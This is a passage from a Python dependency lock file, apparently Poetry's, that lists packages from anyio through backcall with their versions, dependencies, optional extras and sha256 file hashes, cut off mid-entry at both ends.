"anyio-3.7.1.tar.gz", hash = "sha256:44a3c9aba0f5defa43261a8b3efb97891f2bd7d804e0e1f56419befa1adfc780"}, ] [package.dependencies] exceptiongroup = {version = "*", markers = "python_version < \"3.11\""} idna = ">=2.8" sniffio = ">=1.1" [package.extras] doc = ["Sphinx", "packaging", "sphinx-autodoc-typehints (>=1.2.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-jquery"] test = ["anyio[trio]", "coverage[toml] (>=4.5)", "hypothesis (>=4.0)", "mock (>=4)", "psutil (>=5.9)", "pytest (>=7.0)", "pytest-mock (>=3.6.1)", "trustme", "uvloop (>=0.17)"] trio = ["trio (<0.22)"] [[package]] name = "appnope" version = "0.1.3" description = "Disable App Nap on macOS >= 10.9" optional = false python-versions = "*" files = [ {file = "appnope-0.1.3-py2.py3-none-any.whl", hash = "sha256:265a455292d0bd8a72453494fa24df5a11eb18373a60c7c0430889f22548605e"}, {file = "appnope-0.1.3.tar.gz", hash = "sha256:02bd91c4de869fbb1e1c50aafc4098827a7a54ab2f39d9dcba6c9547ed920e24"}, ] [[package]] name = "argon2-cffi" version = "23.1.0" description = "Argon2 for Python" optional = false python-versions = ">=3.7" files = [ {file = "argon2_cffi-23.1.0-py3-none-any.whl", hash = "sha256:c670642b78ba29641818ab2e68bd4e6a78ba53b7eff7b4c3815ae16abf91c7ea"}, {file = "argon2_cffi-23.1.0.tar.gz", hash = "sha256:879c3e79a2729ce768ebb7d36d4609e3a78a4ca2ec3a9f12286ca057e3d0db08"}, ] [package.dependencies] argon2-cffi-bindings = "*" [package.extras] dev = ["argon2-cffi[tests,typing]", "tox (>4)"] docs = ["furo", "myst-parser", "sphinx", "sphinx-copybutton", "sphinx-notfound-page"] tests = ["hypothesis", "pytest"] typing = ["mypy"] [[package]] name = "argon2-cffi-bindings" version = "21.2.0" description = "Low-level CFFI bindings for Argon2" optional = false python-versions = ">=3.6" files = [ {file = "argon2-cffi-bindings-21.2.0.tar.gz", hash = "sha256:bb89ceffa6c791807d1305ceb77dbfacc5aa499891d2c55661c6459651fc39e3"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:ccb949252cb2ab3a08c02024acb77cfb179492d5701c7cbdbfd776124d4d2367"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9524464572e12979364b7d600abf96181d3541da11e23ddf565a32e70bd4dc0d"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b746dba803a79238e925d9046a63aa26bf86ab2a2fe74ce6b009a1c3f5c8f2ae"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:58ed19212051f49a523abb1dbe954337dc82d947fb6e5a0da60f7c8471a8476c"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:bd46088725ef7f58b5a1ef7ca06647ebaf0eb4baff7d1d0d177c6cc8744abd86"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_i686.whl", hash = "sha256:8cd69c07dd875537a824deec19f978e0f2078fdda07fd5c42ac29668dda5f40f"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:f1152ac548bd5b8bcecfb0b0371f082037e47128653df2e8ba6e914d384f3c3e"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win32.whl", hash = "sha256:603ca0aba86b1349b147cab91ae970c63118a0f30444d4bc80355937c950c082"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win_amd64.whl", hash = "sha256:b2ef1c30440dbbcba7a5dc3e319408b59676e2e039e2ae11a8775ecf482b192f"}, {file = "argon2_cffi_bindings-21.2.0-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:e415e3f62c8d124ee16018e491a009937f8cf7ebf5eb430ffc5de21b900dad93"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3e385d1c39c520c08b53d63300c3ecc28622f076f4c2b0e6d7e796e9f6502194"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2c3e3cc67fdb7d82c4718f19b4e7a87123caf8a93fde7e23cf66ac0337d3cb3f"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a22ad9800121b71099d0fb0a65323810a15f2e292f2ba450810a7316e128ee5"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f9f8b450ed0547e3d473fdc8612083fd08dd2120d6ac8f73828df9b7d45bb351"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:93f9bf70084f97245ba10ee36575f0c3f1e7d7724d67d8e5b08e61787c320ed7"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3b9ef65804859d335dc6b31582cad2c5166f0c3e7975f324d9ffaa34ee7e6583"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d4966ef5848d820776f5f562a7d45fdd70c2f330c961d0d745b784034bd9f48d"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:20ef543a89dee4db46a1a6e206cd015360e5a75822f76df533845c3cbaf72670"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ed2937d286e2ad0cc79a7087d3c272832865f779430e0cc2b4f3718d3159b0cb"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:5e00316dabdaea0b2dd82d141cc66889ced0cdcbfa599e8b471cf22c620c329a"}, ] [package.dependencies] cffi = ">=1.0.1" [package.extras] dev = ["cogapp", "pre-commit", "pytest", "wheel"] tests = ["pytest"] [[package]] name = "arrow" version = "1.3.0" description = "Better dates & times for Python" optional = false python-versions = ">=3.8" files = [ {file = "arrow-1.3.0-py3-none-any.whl", hash = "sha256:c728b120ebc00eb84e01882a6f5e7927a53960aa990ce7dd2b10f39005a67f80"}, {file = "arrow-1.3.0.tar.gz", hash = "sha256:d4540617648cb5f895730f1ad8c82a65f2dad0166f57b75f3ca54759c4d67a85"}, ] [package.dependencies] python-dateutil = ">=2.7.0" types-python-dateutil = ">=2.8.10" [package.extras] doc = ["doc8", "sphinx (>=7.0.0)", "sphinx-autobuild", "sphinx-autodoc-typehints", "sphinx_rtd_theme (>=1.3.0)"] test = ["dateparser (==1.*)", "pre-commit", "pytest", "pytest-cov", "pytest-mock", "pytz (==2021.1)", "simplejson (==3.*)"] [[package]] name = "arxiv" version = "1.4.8" description = "Python wrapper for the arXiv API: http://arxiv.org/help/api/" optional = true python-versions = ">=3.7" files = [ {file = "arxiv-1.4.8-py3-none-any.whl", hash = "sha256:c3dbef0fb7ed85c9b4c2157b40a62f5a04ce0d2f63c3ff7caa7798abf6166378"}, {file = "arxiv-1.4.8.tar.gz", hash = "sha256:2a818ea749eaa62a6e24fc31d53b769b4d33ff55cfc5dda7c7b7d309a3b29373"}, ] [package.dependencies] feedparser = "*" [[package]] name = "assemblyai" version = "0.17.0" description = "AssemblyAI Python SDK" optional = true python-versions = ">=3.8" files = [ {file = "assemblyai-0.17.0-py3-none-any.whl", hash = "sha256:3bad8cc7545b5b831f243f1b2f01bc4cc0e8aad78babf44c8008f2293c540e36"}, {file = "assemblyai-0.17.0.tar.gz", hash = "sha256:6d5bbfbbaa626ed021c3d3dec0ca52b3ebf6e6ef277ac76a7a6aed52182d531e"}, ] [package.dependencies] httpx = ">=0.19.0" pydantic = ">=1.7.0,<1.10.7 || >1.10.7" typing-extensions = ">=3.7" websockets = ">=11.0" [package.extras] extras = ["pyaudio (>=0.2.13)"] [[package]] name = "asttokens" version = "2.4.1" description = "Annotate AST trees with source code positions" optional = false python-versions = "*" files = [ {file = "asttokens-2.4.1-py2.py3-none-any.whl", hash = "sha256:051ed49c3dcae8913ea7cd08e46a606dba30b79993209636c4875bc1d637bc24"}, {file = "asttokens-2.4.1.tar.gz", hash = "sha256:b03869718ba9a6eb027e134bfdf69f38a236d681c83c160d510768af11254ba0"}, ] [package.dependencies] six = ">=1.12.0" [package.extras] astroid = ["astroid (>=1,<2)", "astroid (>=2,<4)"] test = ["astroid (>=1,<2)", "astroid (>=2,<4)", "pytest"] [[package]] name = "astunparse" version = "1.6.3" description = "An AST unparser for Python" optional = true python-versions = "*" files = [ {file = "astunparse-1.6.3-py2.py3-none-any.whl", hash = "sha256:c2652417f2c8b5bb325c885ae329bdf3f86424075c4fd1a128674bc6fba4b8e8"}, {file = "astunparse-1.6.3.tar.gz", hash = "sha256:5ad93a8456f0d084c3456d059fd9a92cce667963232cbf763eac3bc5b7940872"}, ] [package.dependencies] six = ">=1.6.1,<2.0" wheel = ">=0.23.0,<1.0" [[package]] name = "async-lru" version = "2.0.4" description = "Simple LRU cache for asyncio" optional = false python-versions = ">=3.8" files = [ {file = "async-lru-2.0.4.tar.gz", hash = "sha256:b8a59a5df60805ff63220b2a0c5b5393da5521b113cd5465a44eb037d81a5627"}, {file = "async_lru-2.0.4-py3-none-any.whl", hash = "sha256:ff02944ce3c288c5be660c42dbcca0742b32c3b279d6dceda655190240b99224"}, ] [package.dependencies] typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""} [[package]] name = "async-timeout" version = "4.0.3" description = "Timeout context manager for asyncio programs" optional = false python-versions = ">=3.7" files = [ {file = "async-timeout-4.0.3.tar.gz", hash = "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f"}, {file = "async_timeout-4.0.3-py3-none-any.whl", hash = "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028"}, ] [[package]] name = "asyncpg" version = "0.28.0" description = "An asyncio PostgreSQL driver" optional = true python-versions = ">=3.7.0" files = [ {file = "asyncpg-0.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a6d1b954d2b296292ddff4e0060f494bb4270d87fb3655dd23c5c6096d16d83"}, {file = "asyncpg-0.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0740f836985fd2bd73dca42c50c6074d1d61376e134d7ad3ad7566c4f79f8184"}, {file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e907cf620a819fab1737f2dd90c0f185e2a796f139ac7de6aa3212a8af96c050"}, {file = "asyncpg-0.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:86b339984d55e8202e0c4b252e9573e26e5afa05617ed02252544f7b3e6de3e9"}, {file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0c402745185414e4c204a02daca3d22d732b37359db4d2e705172324e2d94e85"}, {file = "asyncpg-0.28.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c88eef5e096296626e9688f00ab627231f709d0e7e3fb84bb4413dff81d996d7"}, {file = "asyncpg-0.28.0-cp310-cp310-win32.whl", hash = "sha256:90a7bae882a9e65a9e448fdad3e090c2609bb4637d2a9c90bfdcebbfc334bf89"}, {file = "asyncpg-0.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:76aacdcd5e2e9999e83c8fbcb748208b60925cc714a578925adcb446d709016c"}, {file = "asyncpg-0.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a0e08fe2c9b3618459caaef35979d45f4e4f8d4f79490c9fa3367251366af207"}, {file = "asyncpg-0.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:b24e521f6060ff5d35f761a623b0042c84b9c9b9fb82786aadca95a9cb4a893b"}, {file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:99417210461a41891c4ff301490a8713d1ca99b694fef05dabd7139f9d64bd6c"}, {file = "asyncpg-0.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f029c5adf08c47b10bcdc857001bbef551ae51c57b3110964844a9d79ca0f267"}, {file = "asyncpg-0.28.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ad1d6abf6c2f5152f46fff06b0e74f25800ce8ec6c80967f0bc789974de3c652"}, {file = "asyncpg-0.28.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d7fa81ada2807bc50fea1dc741b26a4e99258825ba55913b0ddbf199a10d69d8"}, {file = "asyncpg-0.28.0-cp311-cp311-win32.whl", hash = "sha256:f33c5685e97821533df3ada9384e7784bd1e7865d2b22f153f2e4bd4a083e102"}, {file = "asyncpg-0.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:5e7337c98fb493079d686a4a6965e8bcb059b8e1b8ec42106322fc6c1c889bb0"}, {file = "asyncpg-0.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1c56092465e718a9fdcc726cc3d9dcf3a692e4834031c9a9f871d92a75d20d48"}, {file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4acd6830a7da0eb4426249d71353e8895b350daae2380cb26d11e0d4a01c5472"}, {file = "asyncpg-0.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:63861bb4a540fa033a56db3bb58b0c128c56fad5d24e6d0a8c37cb29b17c1c7d"}, {file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a93a94ae777c70772073d0512f21c74ac82a8a49be3a1d982e3f259ab5f27307"}, {file = "asyncpg-0.28.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d14681110e51a9bc9c065c4e7944e8139076a778e56d6f6a306a26e740ed86d2"}, {file = "asyncpg-0.28.0-cp37-cp37m-win32.whl", hash = "sha256:8aec08e7310f9ab322925ae5c768532e1d78cfb6440f63c078b8392a38aa636a"}, {file = "asyncpg-0.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:319f5fa1ab0432bc91fb39b3960b0d591e6b5c7844dafc92c79e3f1bff96abef"}, {file = "asyncpg-0.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b337ededaabc91c26bf577bfcd19b5508d879c0ad009722be5bb0a9dd30b85a0"}, {file = "asyncpg-0.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4d32b680a9b16d2957a0a3cc6b7fa39068baba8e6b728f2e0a148a67644578f4"}, {file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4f62f04cdf38441a70f279505ef3b4eadf64479b17e707c950515846a2df197"}, {file = "asyncpg-0.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4f20cac332c2576c79c2e8e6464791c1f1628416d1115935a34ddd7121bfc6a4"}, {file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:59f9712ce01e146ff71d95d561fb68bd2d588a35a187116ef05028675462d5ed"}, {file = "asyncpg-0.28.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fc9e9f9ff1aa0eddcc3247a180ac9e9b51a62311e988809ac6152e8fb8097756"}, {file = "asyncpg-0.28.0-cp38-cp38-win32.whl", hash = "sha256:9e721dccd3838fcff66da98709ed884df1e30a95f6ba19f595a3706b4bc757e3"}, {file = "asyncpg-0.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:8ba7d06a0bea539e0487234511d4adf81dc8762249858ed2a580534e1720db00"}, {file = "asyncpg-0.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d009b08602b8b18edef3a731f2ce6d3f57d8dac2a0a4140367e194eabd3de457"}, {file = "asyncpg-0.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ec46a58d81446d580fb21b376ec6baecab7288ce5a578943e2fc7ab73bf7eb39"}, {file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b48ceed606cce9e64fd5480a9b0b9a95cea2b798bb95129687abd8599c8b019"}, {file = "asyncpg-0.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8858f713810f4fe67876728680f42e93b7e7d5c7b61cf2118ef9153ec16b9423"}, {file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:5e18438a0730d1c0c1715016eacda6e9a505fc5aa931b37c97d928d44941b4bf"}, {file = "asyncpg-0.28.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:e9c433f6fcdd61c21a715ee9128a3ca48be8ac16fa07be69262f016bb0f4dbd2"}, {file = "asyncpg-0.28.0-cp39-cp39-win32.whl", hash = "sha256:41e97248d9076bc8e4849da9e33e051be7ba37cd507cbd51dfe4b2d99c70e3dc"}, {file = "asyncpg-0.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:3ed77f00c6aacfe9d79e9eff9e21729ce92a4b38e80ea99a58ed382f42ebd55b"}, {file = "asyncpg-0.28.0.tar.gz", hash = "sha256:7252cdc3acb2f52feaa3664280d3bcd78a46bd6c10bfd681acfffefa1120e278"}, ] [package.extras] docs = ["Sphinx (>=5.3.0,<5.4.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-asyncio (>=0.3.0,<0.4.0)"] test = ["flake8 (>=5.0,<6.0)", "uvloop (>=0.15.3)"] [[package]] name = "atlassian-python-api" version = "3.41.3" description = "Python Atlassian REST API Wrapper" optional = true python-versions = "*" files = [ {file = "atlassian-python-api-3.41.3.tar.gz", hash = "sha256:a29aae8f456babe125e3371a0355018e9c1d37190333efc312bd81163bd96ffd"}, {file = "atlassian_python_api-3.41.3-py3-none-any.whl", hash = "sha256:7661d3ce3c80e887a7e5ec1c61c1e37d3eaacb4857e377b38ef4084d0f067757"}, ] [package.dependencies] deprecated = "*" oauthlib = "*" requests = "*" requests-oauthlib = "*" six = "*" [package.extras] kerberos = ["requests-kerberos"] [[package]] name = "attr" version = "0.3.2" description = "Simple decorator to set attributes of target function or class in a DRY way." optional = true python-versions = "*" files = [ {file = "attr-0.3.2-py2.py3-none-any.whl", hash = "sha256:4f4bffeea8c27387bde446675a7ac24f3b8fea1075f12d849b5f5c5181fc8336"}, {file = "attr-0.3.2.tar.gz", hash = "sha256:1ceebca768181cdcce9827611b1d728e592be5d293911539ea3d0b0bfa1146f4"}, ] [[package]] name = "attrs" version = "23.1.0" description = "Classes Without Boilerplate" optional = false python-versions = ">=3.7" files = [ {file = "attrs-23.1.0-py3-none-any.whl", hash = "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04"}, {file = "attrs-23.1.0.tar.gz", hash = "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015"}, ] [package.extras] cov = ["attrs[tests]", "coverage[toml] (>=5.3)"] dev = ["attrs[docs,tests]", "pre-commit"] docs = ["furo", "myst-parser", "sphinx", "sphinx-notfound-page", "sphinxcontrib-towncrier", "towncrier", "zope-interface"] tests = ["attrs[tests-no-zope]", "zope-interface"] tests-no-zope = ["cloudpickle", "hypothesis", "mypy (>=1.1.1)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "pytest-xdist[psutil]"] [[package]] name = "audioread" version = "3.0.1" description = "Multi-library, cross-platform audio decoding." optional = true python-versions = ">=3.6" files = [ {file = "audioread-3.0.1-py3-none-any.whl", hash = "sha256:4cdce70b8adc0da0a3c9e0d85fb10b3ace30fbdf8d1670fd443929b61d117c33"}, {file = "audioread-3.0.1.tar.gz", hash = "sha256:ac5460a5498c48bdf2e8e767402583a4dcd13f4414d286f42ce4379e8b35066d"}, ] [package.extras] test = ["tox"] [[package]] name = "authlib" version = "1.2.1" description = "The ultimate Python library in building OAuth and OpenID Connect servers and clients." optional = true python-versions = "*" files = [ {file = "Authlib-1.2.1-py2.py3-none-any.whl", hash = "sha256:c88984ea00149a90e3537c964327da930779afa4564e354edfd98410bea01911"}, {file = "Authlib-1.2.1.tar.gz", hash = "sha256:421f7c6b468d907ca2d9afede256f068f87e34d23dd221c07d13d4c234726afb"}, ] [package.dependencies] cryptography = ">=3.2" [[package]] name = "awadb" version = "0.3.10" description = "AI Native database for embedding vectors" optional = true python-versions = ">=3.7" files = [ {file = "awadb-0.3.10-cp310-cp310-macosx_10_13_x86_64.whl", hash = "sha256:1149b1c6fee95bd6e0f7ff625de060db679ea3985cad2332028eb50a76b9726e"}, {file = "awadb-0.3.10-cp310-cp310-macosx_13_0_arm64.whl", hash = "sha256:a447894ed721184a680566ac8584154d6801d1f99e98996c1d4bd198c022aa07"}, {file = "awadb-0.3.10-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:ab21a90930f58e666a6874618813cc32a93b1e2fd4e66901c9e5392844165034"}, {file = "awadb-0.3.10-cp311-cp311-macosx_10_13_x86_64.whl", hash = "sha256:bfa1b64dfb9b77710180be9b2971afa6e19608bad54460b819131c2d24efa4f4"}, {file = "awadb-0.3.10-cp311-cp311-macosx_13_0_arm64.whl", hash = "sha256:45a3094119ca3ee1a04abf23a9c22a14bb06cd938a128b28de423031b471787f"}, {file = "awadb-0.3.10-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:5a8f532621e4e551cdf4ccf0fcfb3a31d3be4d4fe262b26ba7bd7ff769722c9c"}, {file = "awadb-0.3.10-cp37-cp37m-macosx_10_13_x86_64.whl", hash = "sha256:52480a9589e564fb03f504fb2eb26a27fcf552129725fd25a458b0db7d56fde5"}, {file = "awadb-0.3.10-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:d38a1fb571a6e708218c00ec08ffc2b136f9eba8d4308f3d8ed1a3dc89fcdef6"}, {file = "awadb-0.3.10-cp38-cp38-macosx_10_13_x86_64.whl", hash = "sha256:d0e9f2ecb943ea6ba3ccbb849ef79f814fd59efee7d4c698a5220bc3ce308457"}, {file = "awadb-0.3.10-cp38-cp38-macosx_13_0_arm64.whl", hash = "sha256:fb4ab07c75bc3a92be9db2241551f60d705b18bcd48af95d57977084477647d9"}, {file = "awadb-0.3.10-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:157a1f64e8ad3a28cc7cc5a22d39d0703121b1088db46d02adae23ea41a0346c"}, {file = "awadb-0.3.10-cp39-cp39-macosx_10_13_x86_64.whl", hash = "sha256:afad9bec8a0b183de77210cff12fef7d61f8f524cdfd6c0f4c440f7fea763e30"}, {file = "awadb-0.3.10-cp39-cp39-macosx_13_0_arm64.whl", hash = "sha256:71c084197abff80addf3568457a561df54db4bcaf13244f98b68d5fb32d9c2b0"}, {file = "awadb-0.3.10-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:cc9212d8ab743331329b225a594eaa64918e32a06046373bc07821f8e9aa423e"}, ] [package.extras] test = ["pytest (>=6.0)"] [[package]] name = "azure-ai-formrecognizer" version = "3.3.1" description = "Microsoft Azure Form Recognizer Client Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure-ai-formrecognizer-3.3.1.tar.gz", hash = "sha256:bd5f764cc438529589a4e7d2955a22a0883c7cdce291cf14a53a0d9079c3427b"}, {file = "azure_ai_formrecognizer-3.3.1-py3-none-any.whl", hash = "sha256:761612eb454eb866dc143281ad7ba3169e56f43f8f246b72c8429edd181e5e77"}, ] [package.dependencies] azure-common = ">=1.1,<2.0" azure-core = ">=1.23.0,<2.0.0" msrest = ">=0.6.21" typing-extensions = ">=4.0.1" [[package]] name = "azure-ai-vision" version = "0.11.1b1" description = "Microsoft Azure AI Vision SDK for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure_ai_vision-0.11.1b1-py3-none-manylinux1_x86_64.whl", hash = "sha256:6f8563ae26689da6cdee9b2de009a53546ae2fd86c6c180236ce5da5b45f41d3"}, {file = "azure_ai_vision-0.11.1b1-py3-none-win_amd64.whl", hash = "sha256:f5df03b9156feaa1d8c776631967b1455028d30dfd4cd1c732aa0f9c03d01517"}, ] [[package]] name = "azure-cognitiveservices-speech" version = "1.32.1" description = "Microsoft Cognitive Services Speech SDK for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_10_14_x86_64.whl", hash = "sha256:26aa55eb5430f842a1da20dee6c3efe59d27c4209025c579efa63aa438f26298"}, {file = "azure_cognitiveservices_speech-1.32.1-py3-none-macosx_11_0_arm64.whl", hash = "sha256:bb3ddca7f6f001d5e807a79c85e7b7553eb99930752a002216fcd344be5da96c"}, {file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux1_x86_64.whl", hash = "sha256:822b411165cbcf7799967f4858df4258ed6d9836506e93b5c7dda2255b29e7bc"}, {file = "azure_cognitiveservices_speech-1.32.1-py3-none-manylinux2014_aarch64.whl", hash = "sha256:27d75095c12077b334fcb35a615d066703ce52adf414a2ccef3f5f402af07138"}, {file = "azure_cognitiveservices_speech-1.32.1-py3-none-win32.whl", hash = "sha256:8ae7dfee8d4d7bc8a4cea585ed223a12878751452ed493f8c80fbc34502096c6"}, {file = "azure_cognitiveservices_speech-1.32.1-py3-none-win_amd64.whl", hash = "sha256:cdb06dd9fe41a7f05fefec99af59630a90ad2da9f61216160410070c2e309948"}, ] [[package]] name = "azure-common" version = "1.1.28" description = "Microsoft Azure Client Library for Python (Common)" optional = true python-versions = "*" files = [ {file = "azure-common-1.1.28.zip", hash = "sha256:4ac0cd3214e36b6a1b6a442686722a5d8cc449603aa833f3f0f40bda836704a3"}, {file = "azure_common-1.1.28-py2.py3-none-any.whl", hash = "sha256:5c12d3dcf4ec20599ca6b0d3e09e86e146353d443e7fcc050c9a19c1f9df20ad"}, ] [[package]] name = "azure-core" version = "1.29.5" description = "Microsoft Azure Core Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure-core-1.29.5.tar.gz", hash = "sha256:52983c89d394c6f881a121e5101c5fa67278ca3b1f339c8fb2ef39230c70e9ac"}, {file = "azure_core-1.29.5-py3-none-any.whl", hash = "sha256:0fa04b7b1f7d44a4fb8468c4093deb2ea01fdf4faddbf802ed9205615f99d68c"}, ] [package.dependencies] requests = ">=2.18.4" six = ">=1.11.0" typing-extensions = ">=4.6.0" [package.extras] aio = ["aiohttp (>=3.0)"] [[package]] name = "azure-cosmos" version = "4.5.1" description = "Microsoft Azure Cosmos Client Library for Python" optional = true python-versions = ">=3.6" files = [ {file = "azure-cosmos-4.5.1.tar.gz", hash = "sha256:c4ada8381306eec413c01bc50a778e264dc3f4fafa9d696f9df8436148d2aea8"}, {file = "azure_cosmos-4.5.1-py3-none-any.whl", hash = "sha256:3557570cf7197f50c5b11e655c1fbb1ddf433adc94f91381d671cfad8e2d7bdf"}, ] [package.dependencies] azure-core = ">=1.23.0,<2.0.0" [[package]] name = "azure-identity" version = "1.15.0" description = "Microsoft Azure Identity Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure-identity-1.15.0.tar.gz", hash = "sha256:4c28fc246b7f9265610eb5261d65931183d019a23d4b0e99357facb2e6c227c8"}, {file = "azure_identity-1.15.0-py3-none-any.whl", hash = "sha256:a14b1f01c7036f11f148f22cd8c16e05035293d714458d6b44ddf534d93eb912"}, ] [package.dependencies] azure-core = ">=1.23.0,<2.0.0" cryptography = ">=2.5" msal = ">=1.24.0,<2.0.0" msal-extensions = ">=0.3.0,<2.0.0" [[package]] name = "azure-search-documents" version = "11.4.0b8" description = "Microsoft Azure Cognitive Search Client Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "azure-search-documents-11.4.0b8.zip", hash = "sha256:b178ff52918590191a9cb7f411a9ab3cb517663666a501a3e84b715d19b0d93b"}, {file = "azure_search_documents-11.4.0b8-py3-none-any.whl", hash = "sha256:4137daa2db75bff9484d394c16c0604822a51281cad2f50e11d7c48dd8d4b4cf"}, ] [package.dependencies] azure-common = ">=1.1,<2.0" azure-core = ">=1.24.0,<2.0.0" isodate = ">=0.6.0" [[package]] name = "babel" version = "2.13.1" description = "Internationalization utilities" optional = false python-versions = ">=3.7" files = [ {file = "Babel-2.13.1-py3-none-any.whl", hash = "sha256:7077a4984b02b6727ac10f1f7294484f737443d7e2e66c5e4380e41a3ae0b4ed"}, {file = "Babel-2.13.1.tar.gz", hash = "sha256:33e0952d7dd6374af8dbf6768cc4ddf3ccfefc244f9986d4074704f2fbd18900"}, ] [package.dependencies] pytz = {version = ">=2015.7", markers = "python_version < \"3.9\""} setuptools = {version = "*", markers = "python_version >= \"3.12\""} [package.extras] dev = ["freezegun (>=1.0,<2.0)", "pytest (>=6.0)", "pytest-cov"] [[package]] name = "backcall" version = "0.2.0" description = "Specifications for callback functions passed in to an API" optional = false python-versions = "*" files = [ {file = "backcall-0.2.0-py2.py3-none-any.whl", hash = 